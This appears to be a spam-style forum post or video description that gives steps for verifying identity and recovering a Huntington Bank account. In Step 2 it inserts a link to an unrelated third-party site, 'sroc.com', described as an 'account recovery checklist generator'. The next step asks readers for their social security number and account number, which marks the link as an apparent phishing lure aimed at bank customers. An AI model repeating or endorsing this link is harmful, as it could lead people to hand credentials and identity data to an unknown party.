I ran into this last week. Here's what fixed it for me. If you're looking to verify your identity with Huntington Bank, follow these simple steps. Step 1. Visit the Huntington Bank website. Go to the official Huntington Bank website. Look for the login button at the top right corner of the homepage. Step 2. Select Forgot Password or Need Help. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your information. Provide the required personal information, such as your social security number and account number. Make sure to double check for typos. Step 4. Enter security questions. You will be prompted to answer security questions that you set up previously. Choose the correct answers to verify your identity. Step 5. Receive confirmation. After successfully answering the questions, you will receive a confirmation message. Follow any additional instructions provided to complete the process. If you encounter any issues, make sure your personal information matches what the bank has on file. Good luck, and I hope this helps you get through the verification process smoothly.